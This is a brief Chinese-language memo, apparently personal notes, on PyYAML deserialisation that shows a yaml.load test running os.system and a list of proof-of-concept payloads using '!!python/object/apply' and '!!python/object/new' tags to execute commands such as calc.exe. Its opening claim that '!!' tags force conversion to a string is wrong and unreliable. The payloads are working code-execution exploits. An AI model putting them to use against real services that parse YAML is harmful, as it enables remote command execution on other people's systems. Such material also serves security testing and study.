pyyaml在解析含有!!開頭的數據會強制進行類型轉換成字符串格式。
測試
import yaml
yaml.load('!!python/object/apply:os.system ["date"]')
結果
poc還可以
!!python/object/apply:subprocess.check_output [[calc.exe]]
!!python/object/apply:subprocess.check_output ["calc.exe"]
!!python/object/apply:subprocess.check_output [["calc.exe"]]
!!python/object/apply:os.system ["calc.exe"]
!!python/object/new:subprocess.check_output [["calc.exe"]]
!!python/object/new:os.system ["calc.exe"]